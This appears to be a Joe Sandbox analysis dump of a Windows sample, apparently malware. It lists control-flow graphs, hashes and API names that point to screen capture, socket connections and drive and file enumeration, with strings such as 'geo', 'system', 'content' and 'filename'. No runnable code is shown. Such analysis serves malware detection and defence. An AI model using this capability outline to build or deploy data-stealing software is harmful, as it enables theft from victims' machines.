                                                                                                    • Instruction ID: 519781d1c7cf740fd7ae33f2d3440306ea52a2a82c6be86f594cfc1581991563
                                                                                                    • Opcode Fuzzy Hash: b1b5a1a327eb7fdbbdef193e3a0b2110c79f99af1ed725dc7dd222eaa80ed354
                                                                                                    • Instruction Fuzzy Hash: 3FD18222F08B8189F700DB74D4403EC77B2EF59B8CF8552B5EA4C26A99DF38A195C394

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1922 7ff75a6eebf0-7ff75a6eec2b call 7ff75a6ee970 1925 7ff75a6eec2d-7ff75a6eec3c EnterCriticalSection 1922->1925 1926 7ff75a6eec6c 1922->1926 1927 7ff75a6eec90-7ff75a6eecaa LeaveCriticalSection GdipGetImageEncodersSize 1925->1927 1928 7ff75a6eec3e-7ff75a6eec60 GdiplusStartup 1925->1928 1929 7ff75a6eec71-7ff75a6eec8f call 7ff75a71e860 1926->1929 1927->1926 1930 7ff75a6eecac-7ff75a6eecbf 1927->1930 1928->1927 1931 7ff75a6eec62-7ff75a6eec66 LeaveCriticalSection 1928->1931 1933 7ff75a6eecc1-7ff75a6eecca call 7ff75a6ee700 1930->1933 1934 7ff75a6eecfb-7ff75a6eed09 call 7ff75a7083d8 1930->1934 1931->1926 1940 7ff75a6eeccc-7ff75a6eecd6 1933->1940 1941 7ff75a6eecf8 1933->1941 1942 7ff75a6eed10-7ff75a6eed1a 1934->1942 1943 7ff75a6eed0b-7ff75a6eed0e 1934->1943 1945 7ff75a6eece2-7ff75a6eecf6 call 7ff75a71f520 1940->1945 1946 7ff75a6eecd8 1940->1946 1941->1934 1944 7ff75a6eed1e 1942->1944 1943->1944 1947 7ff75a6eed21-7ff75a6eed24 1944->1947 1945->1947 1946->1945 1949 7ff75a6eed26-7ff75a6eed2b 1947->1949 1950 7ff75a6eed30-7ff75a6eed3e GdipGetImageEncoders 1947->1950 1952 7ff75a6eee9e-7ff75a6eeea1 1949->1952 1953 7ff75a6eed44-7ff75a6eed4d 1950->1953 1954 7ff75a6eee89-7ff75a6eee8e 1950->1954 1957 7ff75a6eeea3-7ff75a6eeea7 1952->1957 1958 7ff75a6eeec4-7ff75a6eeec6 1952->1958 1955 7ff75a6eed7f 1953->1955 1956 7ff75a6eed4f-7ff75a6eed5d 1953->1956 1954->1952 1961 7ff75a6eed86-7ff75a6eed96 1955->1961 1959 7ff75a6eed60-7ff75a6eed6b 1956->1959 1960 7ff75a6eeeb0-7ff75a6eeec2 call 7ff75a707620 1957->1960 1958->1929 1962 7ff75a6eed6d-7ff75a6eed72 1959->1962 1963 7ff75a6eed78-7ff75a6eed7d 1959->1963 1960->1958 1965 7ff75a6eedaf-7ff75a6eedcb 1961->1965 1966 7ff75a6eed98-7ff75a6eeda9 1961->1966 1962->1963 1967 7ff75a6eee2d-7ff75a6eee31 1962->1967 1963->1955 1963->1959 1969 7ff75a6eedcd-7ff75a6eee26 GdipCreateBitmapFromScan0 GdipSaveImageToStream 1965->1969 1970 7ff75a6eee38-7ff75a6eee77 GdipCreateBitmapFromHBITMAP GdipSaveImageToStream 1965->1970 1966->1954 1966->1965 1967->1961 1973 7ff75a6eee36 1969->1973 1974 7ff75a6eee28-7ff75a6eee2b 1969->1974 1971 7ff75a6eee90-7ff75a6eee9d GdipDisposeImage 1970->1971 1972 7ff75a6eee79 1970->1972 1971->1952 1975 7ff75a6eee7c-7ff75a6eee83 GdipDisposeImage 1972->1975 1973->1971 1974->1975 1975->1954
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
                                                                                                    • String ID: &
                                                                                                    • API String ID: 1703174404-3042966939
                                                                                                    • Opcode ID: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
                                                                                                    • Instruction ID: 192c14be96c282771edeadf4a2a142a78eb9c5ab7599ba263b74ca41730a5de9
                                                                                                    • Opcode Fuzzy Hash: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
                                                                                                    • Instruction Fuzzy Hash: FA91B332A04B4299F720EF20E8005A9B7A1FF58F98F984579DA0D47B94DF3DE555C350

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2305 7ff75a6efca0-7ff75a6efdc6 call 7ff75a6f58d0 call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 WSAStartup 2320 7ff75a6efdcc-7ff75a6efdec socket 2305->2320 2321 7ff75a6efe87 2305->2321 2323 7ff75a6efe81 WSACleanup 2320->2323 2324 7ff75a6efdf2-7ff75a6efe1e htons 2320->2324 2322 7ff75a6efe89-7ff75a6efe91 2321->2322 2325 7ff75a6efe93-7ff75a6efea4 2322->2325 2326 7ff75a6efec4-7ff75a6eff05 call 7ff75a71e860 2322->2326 2323->2321 2327 7ff75a6efe24-7ff75a6efe34 call 7ff75a6fd830 2324->2327 2328 7ff75a6eff29-7ff75a6eff5a call 7ff75a6eeed0 call 7ff75a6b26d0 2324->2328 2331 7ff75a6efea6-7ff75a6efeb9 2325->2331 2332 7ff75a6efebf call 7ff75a71e880 2325->2332 2339 7ff75a6efe36 2327->2339 2340 7ff75a6efe39-7ff75a6efe65 inet_pton connect 2327->2340 2350 7ff75a6eff92-7ff75a6effaf call 7ff75a6eeed0 2328->2350 2351 7ff75a6eff5c-7ff75a6eff72 2328->2351 2331->2332 2336 7ff75a6f002b-7ff75a6f0030 call 7ff75a708254 2331->2336 2332->2326 2347 7ff75a6f0031-7ff75a6f0036 call 7ff75a708254 2336->2347 2339->2340 2343 7ff75a6eff06-7ff75a6eff10 2340->2343 2344 7ff75a6efe6b-7ff75a6efe72 2340->2344 2343->2328 2348 7ff75a6eff12-7ff75a6eff1b 2343->2348 2344->2327 2349 7ff75a6efe74-7ff75a6efe7b closesocket 2344->2349 2354 7ff75a6eff20-7ff75a6eff28 call 7ff75a6b4600 2348->2354 2355 7ff75a6eff1d 2348->2355 2349->2323 2358 7ff75a6effb4-7ff75a6effd8 call 7ff75a6b26d0 2350->2358 2356 7ff75a6eff74-7ff75a6eff87 2351->2356 2357 7ff75a6eff8d call 7ff75a71e880 2351->2357 2354->2328 2355->2354 2356->2347 2356->2357 2357->2350 2365 7ff75a6f0014-7ff75a6f0020 2358->2365 2366 7ff75a6effda-7ff75a6efff0 2358->2366 2365->2322 2367 7ff75a6efff2-7ff75a6f0005 2366->2367 2368 7ff75a6f0007-7ff75a6f000c call 7ff75a71e880 2366->2368 2367->2368 2369 7ff75a6f0025-7ff75a6f002a call 7ff75a708254 2367->2369 2368->2365 2369->2336
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
                                                                                                    • String ID: geo$system
                                                                                                    • API String ID: 2440148987-2364779556
                                                                                                    • Opcode ID: aebd805efb8e82c1b4d7a2ab7047e6cd64bca564fcb8cc9fd5e8ee7e239778de
                                                                                                    • Instruction ID: 4c7e955e269648d3bd7fd25dec69d88834adca5c59573c91fa892cb4e3804838
                                                                                                    • Opcode Fuzzy Hash: aebd805efb8e82c1b4d7a2ab7047e6cd64bca564fcb8cc9fd5e8ee7e239778de
                                                                                                    • Instruction Fuzzy Hash: A1B1C262F18B4295FB00EF74D4402BCA372EF58B94F885A76DA1D176E9DE38D446C320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3668304517-0
                                                                                                    • Opcode ID: 1b8367a7d2cbc15bbc447106504ff1a97d50fa14dca6b2ca4320e2704d46d26e
                                                                                                    • Instruction ID: 6068ee3e5e189737e8d5c6411f3f1d5cdf03de428ad2e623391314db1ca83272
                                                                                                    • Opcode Fuzzy Hash: 1b8367a7d2cbc15bbc447106504ff1a97d50fa14dca6b2ca4320e2704d46d26e
                                                                                                    • Instruction Fuzzy Hash: 69E1F3A3E14BC245FB10AB34C8413FCA752EF99BA8F545771EA6C06ADADF7891C1C250
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
                                                                                                    • Instruction ID: 5ff96c7eba4129779f000d213abc7ffdfb5a621135b614d45c31a537fee42693
                                                                                                    • Opcode Fuzzy Hash: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
                                                                                                    • Instruction Fuzzy Hash: 7EC1E322A0C78291F7607F1498402BDBBA4FF89B84FDD49B1DA4D07795CE7CE8468760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2177193445-0
                                                                                                    • Opcode ID: 0ed1f0d6d75d13edb5719d14fe28ac9f731d103c8e3e7d84f0abb01f81af53c7
                                                                                                    • Instruction ID: b41220f3307fb87d54f082c32bc5102ff824d4ee5da455cade32342f84610dbd
                                                                                                    • Opcode Fuzzy Hash: 0ed1f0d6d75d13edb5719d14fe28ac9f731d103c8e3e7d84f0abb01f81af53c7
                                                                                                    • Instruction Fuzzy Hash: D9718E72A08B8685FB10AB65E44036DA761FF857A8F940675EEAC13AD9DF7CE0C1C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                    • String ID:
                                                                                                    • API String ID: 4268643673-0
                                                                                                    • Opcode ID: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
                                                                                                    • Instruction ID: 07e8e814c8af6061ecdd15cb4a4c0d87dfd0bf96dab39bc5385388fb31345877
                                                                                                    • Opcode Fuzzy Hash: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
                                                                                                    • Instruction Fuzzy Hash: C5113D32905B51C1FB10EF25E850029B374FF58F64BA8467ADA5D076A4CF39D896C350
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: exists
                                                                                                    • API String ID: 3668304517-2996790960
                                                                                                    • Opcode ID: 395d2dca2a96b1eb7470fdfe99e337380792af0a029e8987cfc45726c758346a
                                                                                                    • Instruction ID: 10b756a5d0edf3f1ad3906cc03bf5f229468c184693dcf5697b9231e70326bc7
                                                                                                    • Opcode Fuzzy Hash: 395d2dca2a96b1eb7470fdfe99e337380792af0a029e8987cfc45726c758346a
                                                                                                    • Instruction Fuzzy Hash: 00A1E972A04B8685FB10EF38D8502ADB362FF48BD8F945671EA5D47A98DF38D191C310
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: exists
                                                                                                    • API String ID: 3668304517-2996790960
                                                                                                    • Opcode ID: 9728017933aa4c07d8c4fd0e3cb6d8387701d9c354e0f9b1edc11a1511a2b59a
                                                                                                    • Instruction ID: 5616e97091cc1624bcf69b8244792758a59ba9cb0d7dac3272b74109edfdf583
                                                                                                    • Opcode Fuzzy Hash: 9728017933aa4c07d8c4fd0e3cb6d8387701d9c354e0f9b1edc11a1511a2b59a
                                                                                                    • Instruction Fuzzy Hash: 8FA1D872E14B8295FB50EF24D8402ADB3B2FF48B98F945671EA5D17A98DF38D581C310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3231578192-0
                                                                                                    • Opcode ID: d80f14cf87453080268adb68deae75d6ba4fc3d7dfc0e44dc0fd8621660a0c44
                                                                                                    • Instruction ID: 885d8b11f674db89bf6b7fee061f48f7227eef20d0857c8b1e8afcf1f04fca16
                                                                                                    • Opcode Fuzzy Hash: d80f14cf87453080268adb68deae75d6ba4fc3d7dfc0e44dc0fd8621660a0c44
                                                                                                    • Instruction Fuzzy Hash: 4031C032A04B8685F720DF61E8406AEB764FF48B98F640635EE9C17A58DF38D492C700
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                    • String ID: exists$ios_base::badbit set
                                                                                                    • API String ID: 3668304517-2074760687
                                                                                                    • Opcode ID: 9c212db4c82d92830e59b70067b9752c57f71beb995aa16eebf0dfdee3594f19
                                                                                                    • Instruction ID: 8ea111a573110c7f25b5b2c5593580220db413d3912a3ada72cdd22d18b1dfc6
                                                                                                    • Opcode Fuzzy Hash: 9c212db4c82d92830e59b70067b9752c57f71beb995aa16eebf0dfdee3594f19
                                                                                                    • Instruction Fuzzy Hash: 9AF14E72A1DBC695FA60EB14E4943EAA361FFC4B40F844172DA8D43AA9EF3CD545CB10
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: exists$ios_base::badbit set
                                                                                                    • API String ID: 0-2074760687
                                                                                                    • Opcode ID: cecd11ad5ee8cdb9877cbbb7edfdf17f2885f2490954fed0ddb21530dbaeee03
                                                                                                    • Instruction ID: c9104b28b0532f8a455bb0b0dca18027b6be9701d5c3dae59c684ab4f1c207ec
                                                                                                    • Opcode Fuzzy Hash: cecd11ad5ee8cdb9877cbbb7edfdf17f2885f2490954fed0ddb21530dbaeee03
                                                                                                    • Instruction Fuzzy Hash: 02F16172A09BC691FA20EB14E4943EEA361FFC4B80F844572DA8D43A99EF7CD545CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$DriveFileFindFirstLogicalStrings
                                                                                                    • String ID: content$filename
                                                                                                    • API String ID: 3820383557-474635906
                                                                                                    • Opcode ID: 128ca15f0d98075c3f0a61a3ca86a0963465cbcc2af5fdb1fcdb19ca973973cb
                                                                                                    • Instruction ID: 7ab04ed4e42bd90f7034918db62c48bbc6bf53e0293fd34014eb2c8c7e8b1270
                                                                                                    • Opcode Fuzzy Hash: 128ca15f0d98075c3f0a61a3ca86a0963465cbcc2af5fdb1fcdb19ca973973cb
                                                                                                    • Instruction Fuzzy Hash: F44186A3F1868181FA20AF15E44026EE752EFC8BF4F5C5771EAAD076DADE3CD1818614
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                    • String ID:
                                                                                                    • API String ID: 73155330-0
                                                                                                    • Opcode ID: 6e25f482e39bbceb6aa85a7054720217b5e50255d695bd2e7a9d549efc5ef31b
                                                                                                    • Instruction ID: e07a874e6eb83ffb0ca7c28d9b0720101924613ab6c9adefb1e0fc9b0037dfbd
                                                                                                    • Opcode Fuzzy Hash: 6e25f482e39bbceb6aa85a7054720217b5e50255d695bd2e7a9d549efc5ef31b
                                                                                                    • Instruction Fuzzy Hash: 7A516262B0974A85FE15AF11A5003B9E652EF08FE4F9C0A71DE6D077D6EE3CD8828350
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
